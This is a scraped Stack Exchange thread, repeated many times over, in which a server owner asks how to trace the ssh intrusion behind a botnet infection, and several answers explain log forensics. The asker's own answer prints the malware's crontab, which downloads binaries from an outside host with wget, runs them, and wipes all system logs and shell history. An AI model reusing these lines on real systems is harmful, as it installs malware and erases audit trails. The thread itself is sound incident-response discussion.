History of IP addresses that accessed a server via sshAutomatically unlock keys on a remote host accessed via...

Are there manual immigration checks for non EU citizens in airports when travelling inside the EU?

What are some ways to season that don't rely on garlic and onions?

What makes a character irredeemable?

How does Donald Trump manage to remain so popular over a rather long period of time?

Driving test in New Zealand?

Can 35 mm film which went through a washing machine still be developed?

Can we calculate the orbit of exoplanets?

As a girl, how can I voice male characters effectively?

Conveying the idea of "down the road" (i.e. in the future)

Why is my vegetable stock bitter, but the chicken stock not?

Does python reuse repeated calculation results?

Is insurance company’s preferred auto shop biased?

Cool way to see through fog and darkness

The answer is the same (tricky puzzle!)

In what sense is SL(2,q) "very far from abelian"?

What is /dev/null and why can't I use hx on it?

Can you take the additional action from the fighter's Action Surge feature before you take your regular action?

Should I hang doors before or after drywall?

Using the Grappler feat, can you grapple and pin (restrain) in the same action?

Unicode-math and declaring symbol font

How to prove (A v B), (A → C), (B → D) therefore (C v D)

Minimum perfect squares needed to sum up to a target

How to explain that the sums of numerators over sums of denominators isn't the same as the mean of ratios?

Redirect output on-the-fly - looks not possible in Linux, why?

History of IP addresses that accessed a server via ssh

Automatically unlock keys on a remote host accessed via SSHWhat are the benefits of using several IP addresses on a server?SSH without knowing IP addressesAvoid ssh authenticity test for local addressesDeny access to SSH via server's IPWhen logged into a Linux system, can I find the ip addresses which can be used to connect to the machine via ssh?Login to Raspberry Pi server remotely via ssh

.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty{
margin-bottom:0;
}

It has come to my attention that a server of mine has been hacked and infected with a known Chinese botnet.

It was a prototype/testing virtual machine with its own static IP(US address) so no harm was caused(just took me a while to figure it out).

Now I would like to know what IP/s was used for the intrusion to know if the attack originated from china.

Is there a way to view a history of received connections on ssh on the server?

Edit: The system is Linux Debian 7

edited 1 hour ago

RalfFriedl

6,1114 gold badges13 silver badges26 bronze badges

asked Apr 3 '14 at 21:58

Dominique

1,5705 gold badges18 silver badges24 bronze badges

add a comment
|

It has come to my attention that a server of mine has been hacked and infected with a known Chinese botnet.

It was a prototype/testing virtual machine with its own static IP(US address) so no harm was caused(just took me a while to figure it out).

Now I would like to know what IP/s was used for the intrusion to know if the attack originated from china.

Is there a way to view a history of received connections on ssh on the server?

Edit: The system is Linux Debian 7

edited 1 hour ago

RalfFriedl

6,1114 gold badges13 silver badges26 bronze badges

asked Apr 3 '14 at 21:58

Dominique

1,5705 gold badges18 silver badges24 bronze badges

add a comment
|

It has come to my attention that a server of mine has been hacked and infected with a known Chinese botnet.

It was a prototype/testing virtual machine with its own static IP(US address) so no harm was caused(just took me a while to figure it out).

Now I would like to know what IP/s was used for the intrusion to know if the attack originated from china.

Is there a way to view a history of received connections on ssh on the server?

Edit: The system is Linux Debian 7

edited 1 hour ago

RalfFriedl

6,1114 gold badges13 silver badges26 bronze badges

asked Apr 3 '14 at 21:58

Dominique

1,5705 gold badges18 silver badges24 bronze badges

It has come to my attention that a server of mine has been hacked and infected with a known Chinese botnet.

It was a prototype/testing virtual machine with its own static IP(US address) so no harm was caused(just took me a while to figure it out).

Now I would like to know what IP/s was used for the intrusion to know if the attack originated from china.

Is there a way to view a history of received connections on ssh on the server?

Edit: The system is Linux Debian 7

networking ssh logs ip forensics

edited 1 hour ago

RalfFriedl

6,1114 gold badges13 silver badges26 bronze badges

asked Apr 3 '14 at 21:58

Dominique

1,5705 gold badges18 silver badges24 bronze badges

edited 1 hour ago

RalfFriedl

6,1114 gold badges13 silver badges26 bronze badges

asked Apr 3 '14 at 21:58

Dominique

1,5705 gold badges18 silver badges24 bronze badges

edited 1 hour ago

RalfFriedl

6,1114 gold badges13 silver badges26 bronze badges

edited 1 hour ago

RalfFriedl

6,1114 gold badges13 silver badges26 bronze badges

edited 1 hour ago

RalfFriedl

6,1114 gold badges13 silver badges26 bronze badges

asked Apr 3 '14 at 21:58

Dominique

1,5705 gold badges18 silver badges24 bronze badges

asked Apr 3 '14 at 21:58

Dominique

1,5705 gold badges18 silver badges24 bronze badges

asked Apr 3 '14 at 21:58

Dominique

1,5705 gold badges18 silver badges24 bronze badges

add a comment
|

8 Answers
8

active

oldest

votes

Look at the output of the last command and anything with an IP address or hostname instead of a blank space came in over the network. If sshd is the only way of doing that on this system, then there you go.

Alternatively (if this is Linux), you can check /var/log/secure (on RH-based distros) or /var/log/auth.log (on Debian-based distros) where sshd will usually keep track of connections made even if they don't result in successful logins (which hits utmp/wtmp, which is what last will read from). Example:

Apr  3 16:21:01 xxxxxxvlp05 sshd[6266]: Connection closed by xxx.xxx.13.76

...

Apr  3 09:09:49 xxxxxxvlp05 sshd[26275]: Failed password for invalid user __super from xxx.xxx.13.76 port 45229 ssh2

IIRC Solaris's sshd (which may not necessarily be OpenSSH's sshd) will log this information to /var/adm/messages

EDIT:

@derobert makes an excellent point. It's important to remember that on any system, if your superuser account is compromised, then all bets are off since log files such as /var/log/wtmp or /var/adm/messages can be modified by the attacker. This can be mitigated if you shove logs off-server to a secure location.

For example, at one shop I used to work at we had an "Audit Vault" machine that was secured so as to only receive the audit log files from the various servers in the data center. I would recommend having a similar setup in the future (since "I have a test machine" sounds like you're operating in a large-ish shop)

edited May 21 at 18:56

answered Apr 3 '14 at 22:00

Bratchley

12.5k7 gold badges48 silver badges92 bronze badges

7

Your answer covers almost everything, so I don't want to add my own... but please add something along the lines of "If the attacker has obtained root, then in most configurations, no logging data on the box can really be trusted, as root can easily edit logs."

– derobert
Apr 3 '14 at 22:09

1

@derobert, I added some details along what you had suggested :)

– Ramesh
Apr 3 '14 at 22:14

Wait, the '/var/log/secure' isn't on Debian, it's in Red Hat distors.

– Secko
May 20 at 1:53

@Secko Edited the answer to include both.

– Bratchley
May 21 at 18:57

add a comment
|

Is there a way to view a history of received connections on ssh on the server?

This should give you a list:

$ zgrep sshd /var/log/auth.log* | grep rhost | sed -re 's/.*rhost=([^ ]+).*/1/' | sort -u

Then you can use geoiplookup from the geoip-bin package to go from hostname or IP-address to country.

answered Apr 4 '14 at 0:23

Torkel Bjørnson-Langen

2561 silver badge5 bronze badges

Useful +1. Can you update the command to show time and date ?

– Eduard Florinescu
Apr 6 '15 at 8:55

3

@Eduard Florinescu Sorry, my sed skills are not that god. To do something more complex, use Python or an dedicated log parser. But you can try this: zgrep sshd /var/log/auth.log* -h |grep -F 'Failed password'

– Torkel Bjørnson-Langen
Jun 6 '15 at 19:01

add a comment
|

Well, as expected, and as @Joel Davis said, all logs were wiped, but there was one file that @Ramesh mentioned that has some attempts to access the root user but failed to enter the correct password a few times, then the disconnect for too many re-tries.

I ran a traceroute on three of the addresses and two are from China and the other is from Pakistan; these are the IPs:

221.120.224.179

116.10.191.218

61.174.51.221

More info about the botnet that was injected into the server after it was compromised:

Hackers edit crontab to execute 7 executables that will, every x amount of time, use up all the CPU, max the servers network output, then simply die. Also they add the readme to crontab 100 times to hide the added lines, so when you do crontab -l you will be spammed by the readme with hidden lines. To circumvent this, I used crontab -l | grep -v '^#' and here is the output of that command:

*/1 * * * * killall -9 .IptabLes

*/1 * * * * killall -9 nfsd4

*/1 * * * * killall -9 profild.key

*/1 * * * * killall -9 nfsd

*/1 * * * * killall -9 DDosl

*/1 * * * * killall -9 lengchao32

*/1 * * * * killall -9 b26

*/1 * * * * killall -9 codelove

*/1 * * * * killall -9 32

*/1 * * * * killall -9 64

*/1 * * * * killall -9 new6

*/1 * * * * killall -9 new4

*/1 * * * * killall -9 node24

*/1 * * * * killall -9 freeBSD

*/99 * * * * killall -9 kysapd

*/98 * * * * killall -9 atdd

*/97 * * * * killall -9 kysapd

*/96 * * * * killall -9 skysapd

*/95 * * * * killall -9 xfsdx

*/94 * * * * killall -9 ksapd

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd

*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd

*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd

*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd

*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd

*/120 * * * * cd /root;rm -rf dir nohup.out

*/360 * * * * cd /etc;rm -rf dir atdd

*/360 * * * * cd /etc;rm -rf dir ksapd

*/360 * * * * cd /etc;rm -rf dir kysapd

*/360 * * * * cd /etc;rm -rf dir skysapd

*/360 * * * * cd /etc;rm -rf dir sksapd

*/360 * * * * cd /etc;rm -rf dir xfsdx

*/1 * * * * cd /etc;rm -rf dir cupsdd.*

*/1 * * * * cd /etc;rm -rf dir atdd.*

*/1 * * * * cd /etc;rm -rf dir ksapd.*

*/1 * * * * cd /etc;rm -rf dir kysapd.*

*/1 * * * * cd /etc;rm -rf dir skysapd.*

*/1 * * * * cd /etc;rm -rf dir sksapd.*

*/1 * * * * cd /etc;rm -rf dir xfsdx.*

*/1 * * * * chmod 7777 /etc/atdd

*/1 * * * * chmod 7777 /etc/cupsdd

*/1 * * * * chmod 7777 /etc/ksapd

*/1 * * * * chmod 7777 /etc/kysapd

*/1 * * * * chmod 7777 /etc/skysapd

*/1 * * * * chmod 7777 /etc/sksapd

*/1 * * * * chmod 7777 /etc/xfsdx

*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&

*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&

*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&

*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&

*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&

*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&

*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&

*/1 * * * * echo "unset MAILCHECK" >> /etc/profile

*/1 * * * * rm -rf /root/.bash_history

*/1 * * * * touch /root/.bash_history

*/1 * * * * history -r

*/1 * * * * cd /var/log > dmesg 

*/1 * * * * cd /var/log > auth.log 

*/1 * * * * cd /var/log > alternatives.log 

*/1 * * * * cd /var/log > boot.log 

*/1 * * * * cd /var/log > btmp 

*/1 * * * * cd /var/log > cron 

*/1 * * * * cd /var/log > cups 

*/1 * * * * cd /var/log > daemon.log 

*/1 * * * * cd /var/log > dpkg.log 

*/1 * * * * cd /var/log > faillog 

*/1 * * * * cd /var/log > kern.log 

*/1 * * * * cd /var/log > lastlog

*/1 * * * * cd /var/log > maillog 

*/1 * * * * cd /var/log > user.log 

*/1 * * * * cd /var/log > Xorg.x.log 

*/1 * * * * cd /var/log > anaconda.log 

*/1 * * * * cd /var/log > yum.log 

*/1 * * * * cd /var/log > secure

*/1 * * * * cd /var/log > wtmp

*/1 * * * * cd /var/log > utmp 

*/1 * * * * cd /var/log > messages

*/1 * * * * cd /var/log > spooler

*/1 * * * * cd /var/log > sudolog

*/1 * * * * cd /var/log > aculog

*/1 * * * * cd /var/log > access-log

*/1 * * * * cd /root > .bash_history

*/1 * * * * history -c

As you can see, all the log files are cleared, this is why I was not able to retrieve a lot of information.

It brought down the entire server (all the VMs) causing timeouts on the sites and on proxmox. Here is a graph (the spikes denote the botnet actively DDoS'ing and notice the network out):
botnet activity

As a result I will be adding the entire range of Chinese IP addresses to a firewall to block all the connections (I don't have any Chinese users so I don't care), I will also disallow remote root logins and use long complex passwords. I will also most likely change the ssh port and use private ssh keys as well.

edited Apr 6 at 0:52

community wiki

3 revs, 3 users 69%
Dominique

3

This is pretty scary stuff - any idea how they accessed your system? Was it simply a brute force hack against a weak password?

– user35581
Jun 17 '16 at 15:30

add a comment
|

From this answer, I see the below information.

Talking about SSH servers, I will give you command line solutions.

Track user logins and logouts. That's easy, the file /var/log/auth.log should have this information.

Track activity of those users: If they are somewhat innocent, you can check the file .bash_history in their home directory. You will see a list of the commands that they executed. The problem is of course that they can delete or edit this file.

Prevent users from deleting logs: Users shouldn't be able to touch auth.log. In order to stop them from playing with bash_history you need to do a couple of tricks.

What if the user manages to obtain root access? : You're screwed. Unless he makes a mistake he will be able to hide all his footsteps.

Also, from this answer, we can see the IP address of a client using the SSH_CLIENT variable.

Also from this answer, I see that ssh history could be stored in these files.

In addition to /var/log/lastlog, there are 3 files in /var/run and /var/log: utmp, wtmp and btmp, which hold info about current logins (and additional info), historical and failed logins. See wiki for detailed description. You can't edit the files with normal editors, but could erase them.

edited May 23 '17 at 12:39

Community♦

answered Apr 3 '14 at 22:13

Ramesh

25.5k37 gold badges108 silver badges191 bronze badges

add a comment
|

Simplest command to get the last 10 users logged in to the machine is last|head.

To get all the users simply use last command

edited Oct 5 '17 at 7:54

Kevdog777

2,13213 gold badges36 silver badges61 bronze badges

answered Oct 5 '17 at 7:22

Nikhil Katre

1112 bronze badges

add a comment
|

This machine has been compromised. This means any data on it, historical or current, can no longer be trusted.

In short, the answer is no. You cannot be sure you have found the originating address from any log file recorded on this machine.

Wipe and reinstall. And patch.

answered Oct 5 '17 at 8:03

roaima

50k7 gold badges66 silver badges133 bronze badges

add a comment
|

To see only successful login attempts with password:

zgrep sshd /var/log/auth.log* -h |grep -F 'Accepted password for'

edited Apr 30 at 4:20

answered Apr 30 at 3:59

Vini

1114 bronze badges

add a comment
|

for debian the test search is worded slightly different

zgrep sshd /var/log/auth.log* -h |grep -F 'session opened for user'

answered 4 hours ago

CRTLBREAK

392 bronze badges

add a comment
|

Your Answer

StackExchange.ready(function() {
var channelOptions = {
tags: "".split(" "),
id: "106"
};
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function() {
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled) {
StackExchange.using("snippets", function() {
createEditor();
});
}
else {
createEditor();
}
});

function createEditor() {
StackExchange.prepareEditor({
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader: {
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/4.0/"u003ecc by-sa 4.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
},
onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
});

}
});

draft saved

draft discarded

Sign up or log in

StackExchange.ready(function () {
StackExchange.helpers.onClickDraftSave('#login-link');
});

Post as a guest

Name

Required, but never shown

StackExchange.ready(
function () {
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2funix.stackexchange.com%2fquestions%2f123029%2fhistory-of-ip-addresses-that-accessed-a-server-via-ssh%23new-answer', 'question_page');
}
);

Post as a guest

Name

Required, but never shown

8 Answers
8

active

oldest

votes

8 Answers
8

active

oldest

votes

Apr  3 16:21:01 xxxxxxvlp05 sshd[6266]: Connection closed by xxx.xxx.13.76

...

Apr  3 09:09:49 xxxxxxvlp05 sshd[26275]: Failed password for invalid user __super from xxx.xxx.13.76 port 45229 ssh2

IIRC Solaris's sshd (which may not necessarily be OpenSSH's sshd) will log this information to /var/adm/messages

EDIT:

edited May 21 at 18:56

answered Apr 3 '14 at 22:00

Bratchley

12.5k7 gold badges48 silver badges92 bronze badges

7

Your answer covers almost everything, so I don't want to add my own... but please add something along the lines of "If the attacker has obtained root, then in most configurations, no logging data on the box can really be trusted, as root can easily edit logs."

– derobert
Apr 3 '14 at 22:09

1

@derobert, I added some details along what you had suggested :)

– Ramesh
Apr 3 '14 at 22:14

Wait, the '/var/log/secure' isn't on Debian, it's in Red Hat distors.

– Secko
May 20 at 1:53

@Secko Edited the answer to include both.

– Bratchley
May 21 at 18:57

add a comment
|

Apr  3 16:21:01 xxxxxxvlp05 sshd[6266]: Connection closed by xxx.xxx.13.76

...

Apr  3 09:09:49 xxxxxxvlp05 sshd[26275]: Failed password for invalid user __super from xxx.xxx.13.76 port 45229 ssh2

IIRC Solaris's sshd (which may not necessarily be OpenSSH's sshd) will log this information to /var/adm/messages

EDIT:

edited May 21 at 18:56

answered Apr 3 '14 at 22:00

Bratchley

12.5k7 gold badges48 silver badges92 bronze badges

7

Your answer covers almost everything, so I don't want to add my own... but please add something along the lines of "If the attacker has obtained root, then in most configurations, no logging data on the box can really be trusted, as root can easily edit logs."

– derobert
Apr 3 '14 at 22:09

1

@derobert, I added some details along what you had suggested :)

– Ramesh
Apr 3 '14 at 22:14

Wait, the '/var/log/secure' isn't on Debian, it's in Red Hat distors.

– Secko
May 20 at 1:53

@Secko Edited the answer to include both.

– Bratchley
May 21 at 18:57

add a comment
|

Apr  3 16:21:01 xxxxxxvlp05 sshd[6266]: Connection closed by xxx.xxx.13.76

...

Apr  3 09:09:49 xxxxxxvlp05 sshd[26275]: Failed password for invalid user __super from xxx.xxx.13.76 port 45229 ssh2

IIRC Solaris's sshd (which may not necessarily be OpenSSH's sshd) will log this information to /var/adm/messages

EDIT:

edited May 21 at 18:56

answered Apr 3 '14 at 22:00

Bratchley

12.5k7 gold badges48 silver badges92 bronze badges

Apr  3 16:21:01 xxxxxxvlp05 sshd[6266]: Connection closed by xxx.xxx.13.76

...

Apr  3 09:09:49 xxxxxxvlp05 sshd[26275]: Failed password for invalid user __super from xxx.xxx.13.76 port 45229 ssh2

IIRC Solaris's sshd (which may not necessarily be OpenSSH's sshd) will log this information to /var/adm/messages

EDIT:

edited May 21 at 18:56

answered Apr 3 '14 at 22:00

Bratchley

12.5k7 gold badges48 silver badges92 bronze badges

edited May 21 at 18:56

answered Apr 3 '14 at 22:00

Bratchley

12.5k7 gold badges48 silver badges92 bronze badges

answered Apr 3 '14 at 22:00

Bratchley

12.5k7 gold badges48 silver badges92 bronze badges

answered Apr 3 '14 at 22:00

Bratchley

12.5k7 gold badges48 silver badges92 bronze badges

7

Your answer covers almost everything, so I don't want to add my own... but please add something along the lines of "If the attacker has obtained root, then in most configurations, no logging data on the box can really be trusted, as root can easily edit logs."

– derobert
Apr 3 '14 at 22:09

1

@derobert, I added some details along what you had suggested :)

– Ramesh
Apr 3 '14 at 22:14

Wait, the '/var/log/secure' isn't on Debian, it's in Red Hat distors.

– Secko
May 20 at 1:53

@Secko Edited the answer to include both.

– Bratchley
May 21 at 18:57

add a comment
|

7

Your answer covers almost everything, so I don't want to add my own... but please add something along the lines of "If the attacker has obtained root, then in most configurations, no logging data on the box can really be trusted, as root can easily edit logs."

– derobert
Apr 3 '14 at 22:09

1

@derobert, I added some details along what you had suggested :)

– Ramesh
Apr 3 '14 at 22:14

Wait, the '/var/log/secure' isn't on Debian, it's in Red Hat distors.

– Secko
May 20 at 1:53

@Secko Edited the answer to include both.

– Bratchley
May 21 at 18:57

Your answer covers almost everything, so I don't want to add my own... but please add something along the lines of "If the attacker has obtained root, then in most configurations, no logging data on the box can really be trusted, as root can easily edit logs."

– derobert
Apr 3 '14 at 22:09

@derobert, I added some details along what you had suggested :)

– Ramesh
Apr 3 '14 at 22:14

Wait, the '/var/log/secure' isn't on Debian, it's in Red Hat distors.

– Secko
May 20 at 1:53

@Secko Edited the answer to include both.

– Bratchley
May 21 at 18:57

add a comment
|

Is there a way to view a history of received connections on ssh on the server?

This should give you a list:

$ zgrep sshd /var/log/auth.log* | grep rhost | sed -re 's/.*rhost=([^ ]+).*/1/' | sort -u

Then you can use geoiplookup from the geoip-bin package to go from hostname or IP-address to country.

answered Apr 4 '14 at 0:23

Torkel Bjørnson-Langen

2561 silver badge5 bronze badges

Useful +1. Can you update the command to show time and date ?

– Eduard Florinescu
Apr 6 '15 at 8:55

3

@Eduard Florinescu Sorry, my sed skills are not that god. To do something more complex, use Python or an dedicated log parser. But you can try this: zgrep sshd /var/log/auth.log* -h |grep -F 'Failed password'

– Torkel Bjørnson-Langen
Jun 6 '15 at 19:01

add a comment
|

Is there a way to view a history of received connections on ssh on the server?

This should give you a list:

$ zgrep sshd /var/log/auth.log* | grep rhost | sed -re 's/.*rhost=([^ ]+).*/1/' | sort -u

Then you can use geoiplookup from the geoip-bin package to go from hostname or IP-address to country.

answered Apr 4 '14 at 0:23

Torkel Bjørnson-Langen

2561 silver badge5 bronze badges

Useful +1. Can you update the command to show time and date ?

– Eduard Florinescu
Apr 6 '15 at 8:55

3

@Eduard Florinescu Sorry, my sed skills are not that god. To do something more complex, use Python or an dedicated log parser. But you can try this: zgrep sshd /var/log/auth.log* -h |grep -F 'Failed password'

– Torkel Bjørnson-Langen
Jun 6 '15 at 19:01

add a comment
|

Is there a way to view a history of received connections on ssh on the server?

This should give you a list:

$ zgrep sshd /var/log/auth.log* | grep rhost | sed -re 's/.*rhost=([^ ]+).*/1/' | sort -u

Then you can use geoiplookup from the geoip-bin package to go from hostname or IP-address to country.

answered Apr 4 '14 at 0:23

Torkel Bjørnson-Langen

2561 silver badge5 bronze badges

Is there a way to view a history of received connections on ssh on the server?

This should give you a list:

$ zgrep sshd /var/log/auth.log* | grep rhost | sed -re 's/.*rhost=([^ ]+).*/1/' | sort -u

Then you can use geoiplookup from the geoip-bin package to go from hostname or IP-address to country.

answered Apr 4 '14 at 0:23

Torkel Bjørnson-Langen

2561 silver badge5 bronze badges

answered Apr 4 '14 at 0:23

Torkel Bjørnson-Langen

2561 silver badge5 bronze badges

answered Apr 4 '14 at 0:23

Torkel Bjørnson-Langen

2561 silver badge5 bronze badges

answered Apr 4 '14 at 0:23

Torkel Bjørnson-Langen

2561 silver badge5 bronze badges

Useful +1. Can you update the command to show time and date ?

– Eduard Florinescu
Apr 6 '15 at 8:55

3

@Eduard Florinescu Sorry, my sed skills are not that god. To do something more complex, use Python or an dedicated log parser. But you can try this: zgrep sshd /var/log/auth.log* -h |grep -F 'Failed password'

– Torkel Bjørnson-Langen
Jun 6 '15 at 19:01

add a comment
|

Useful +1. Can you update the command to show time and date ?

– Eduard Florinescu
Apr 6 '15 at 8:55

3

@Eduard Florinescu Sorry, my sed skills are not that god. To do something more complex, use Python or an dedicated log parser. But you can try this: zgrep sshd /var/log/auth.log* -h |grep -F 'Failed password'

– Torkel Bjørnson-Langen
Jun 6 '15 at 19:01

Useful +1. Can you update the command to show time and date ?

– Eduard Florinescu
Apr 6 '15 at 8:55

@Eduard Florinescu Sorry, my sed skills are not that god. To do something more complex, use Python or an dedicated log parser. But you can try this: zgrep sshd /var/log/auth.log* -h |grep -F 'Failed password'

– Torkel Bjørnson-Langen
Jun 6 '15 at 19:01

add a comment
|

I ran a traceroute on three of the addresses and two are from China and the other is from Pakistan; these are the IPs:

221.120.224.179

116.10.191.218

61.174.51.221

More info about the botnet that was injected into the server after it was compromised:

*/1 * * * * killall -9 .IptabLes

*/1 * * * * killall -9 nfsd4

*/1 * * * * killall -9 profild.key

*/1 * * * * killall -9 nfsd

*/1 * * * * killall -9 DDosl

*/1 * * * * killall -9 lengchao32

*/1 * * * * killall -9 b26

*/1 * * * * killall -9 codelove

*/1 * * * * killall -9 32

*/1 * * * * killall -9 64

*/1 * * * * killall -9 new6

*/1 * * * * killall -9 new4

*/1 * * * * killall -9 node24

*/1 * * * * killall -9 freeBSD

*/99 * * * * killall -9 kysapd

*/98 * * * * killall -9 atdd

*/97 * * * * killall -9 kysapd

*/96 * * * * killall -9 skysapd

*/95 * * * * killall -9 xfsdx

*/94 * * * * killall -9 ksapd

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd

*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd

*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd

*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd

*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd

*/120 * * * * cd /root;rm -rf dir nohup.out

*/360 * * * * cd /etc;rm -rf dir atdd

*/360 * * * * cd /etc;rm -rf dir ksapd

*/360 * * * * cd /etc;rm -rf dir kysapd

*/360 * * * * cd /etc;rm -rf dir skysapd

*/360 * * * * cd /etc;rm -rf dir sksapd

*/360 * * * * cd /etc;rm -rf dir xfsdx

*/1 * * * * cd /etc;rm -rf dir cupsdd.*

*/1 * * * * cd /etc;rm -rf dir atdd.*

*/1 * * * * cd /etc;rm -rf dir ksapd.*

*/1 * * * * cd /etc;rm -rf dir kysapd.*

*/1 * * * * cd /etc;rm -rf dir skysapd.*

*/1 * * * * cd /etc;rm -rf dir sksapd.*

*/1 * * * * cd /etc;rm -rf dir xfsdx.*

*/1 * * * * chmod 7777 /etc/atdd

*/1 * * * * chmod 7777 /etc/cupsdd

*/1 * * * * chmod 7777 /etc/ksapd

*/1 * * * * chmod 7777 /etc/kysapd

*/1 * * * * chmod 7777 /etc/skysapd

*/1 * * * * chmod 7777 /etc/sksapd

*/1 * * * * chmod 7777 /etc/xfsdx

*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&

*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&

*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&

*/98 * * * * nohup /etc/kysapd > /dev/null 2>&1&

*/97 * * * * nohup /etc/skysapd > /dev/null 2>&1&

*/96 * * * * nohup /etc/xfsdx > /dev/null 2>&1&

*/95 * * * * nohup /etc/ksapd > /dev/null 2>&1&

*/1 * * * * echo "unset MAILCHECK" >> /etc/profile

*/1 * * * * rm -rf /root/.bash_history

*/1 * * * * touch /root/.bash_history

*/1 * * * * history -r

*/1 * * * * cd /var/log > dmesg 

*/1 * * * * cd /var/log > auth.log 

*/1 * * * * cd /var/log > alternatives.log 

*/1 * * * * cd /var/log > boot.log 

*/1 * * * * cd /var/log > btmp 

*/1 * * * * cd /var/log > cron 

*/1 * * * * cd /var/log > cups 

*/1 * * * * cd /var/log > daemon.log 

*/1 * * * * cd /var/log > dpkg.log 

*/1 * * * * cd /var/log > faillog 

*/1 * * * * cd /var/log > kern.log 

*/1 * * * * cd /var/log > lastlog

*/1 * * * * cd /var/log > maillog 

*/1 * * * * cd /var/log > user.log 

*/1 * * * * cd /var/log > Xorg.x.log 

*/1 * * * * cd /var/log > anaconda.log 

*/1 * * * * cd /var/log > yum.log 

*/1 * * * * cd /var/log > secure

*/1 * * * * cd /var/log > wtmp

*/1 * * * * cd /var/log > utmp 

*/1 * * * * cd /var/log > messages

*/1 * * * * cd /var/log > spooler

*/1 * * * * cd /var/log > sudolog

*/1 * * * * cd /var/log > aculog

*/1 * * * * cd /var/log > access-log

*/1 * * * * cd /root > .bash_history

*/1 * * * * history -c

As you can see, all the log files are cleared, this is why I was not able to retrieve a lot of information.

edited Apr 6 at 0:52

community wiki

3 revs, 3 users 69%
Dominique

3

This is pretty scary stuff - any idea how they accessed your system? Was it simply a brute force hack against a weak password?

– user35581
Jun 17 '16 at 15:30

add a comment
|

I ran a traceroute on three of the addresses and two are from China and the other is from Pakistan; these are the IPs:

221.120.224.179

116.10.191.218

61.174.51.221

More info about the botnet that was injected into the server after it was compromised:

*/1 * * * * killall -9 .IptabLes

*/1 * * * * killall -9 nfsd4

*/1 * * * * killall -9 profild.key

*/1 * * * * killall -9 nfsd

*/1 * * * * killall -9 DDosl

*/1 * * * * killall -9 lengchao32

*/1 * * * * killall -9 b26

*/1 * * * * killall -9 codelove

*/1 * * * * killall -9 32

*/1 * * * * killall -9 64

*/1 * * * * killall -9 new6

*/1 * * * * killall -9 new4

*/1 * * * * killall -9 node24

*/1 * * * * killall -9 freeBSD

*/99 * * * * killall -9 kysapd

*/98 * * * * killall -9 atdd

*/97 * * * * killall -9 kysapd

*/96 * * * * killall -9 skysapd

*/95 * * * * killall -9 xfsdx

*/94 * * * * killall -9 ksapd

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd

*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd

*/130 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd

*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd

*/140 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/xfsdx

*/120 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd

*/120 * * * * cd /root;rm -rf dir nohup.out

*/360 * * * * cd /etc;rm -rf dir atdd

*/360 * * * * cd /etc;rm -rf dir ksapd

*/360 * * * * cd /etc;rm -rf dir kysapd

*/360 * * * * cd /etc;rm -rf dir skysapd

*/360 * * * * cd /etc;rm -rf dir sksapd

*/360 * * * * cd /etc;rm -rf dir xfsdx

*/1 * * * * cd /etc;rm -rf dir cupsdd.*

*/1 * * * * cd /etc;rm -rf dir atdd.*

*/1 * * * * cd /etc;rm -rf dir ksapd.*

*/1 * * * * cd /etc;rm -rf dir kysapd.*

*/1 * * * * cd /etc;rm -rf dir skysapd.*

*/1 * * * * cd /etc;rm -rf dir sksapd.*

*/1 * * * * cd /etc;rm -rf dir xfsdx.*

*/1 * * * * chmod 7777 /etc/atdd

*/1 * * * * chmod 7777 /etc/cupsdd

*/1 * * * * chmod 7777 /etc/ksapd

*/1 * * * * chmod 7777 /etc/kysapd

*/1 * * * * chmod 7777 /etc/skysapd

*/1 * * * * chmod 7777 /etc/sksapd

*/1 * * * * chmod 7777 /etc/xfsdx

*/99 * * * * nohup /etc/cupsdd > /dev/null 2>&1&

*/100 * * * * nohup /etc/kysapd > /dev/null 2>&1&

*/99 * * * * nohup /etc/atdd > /dev/null 2>&1&

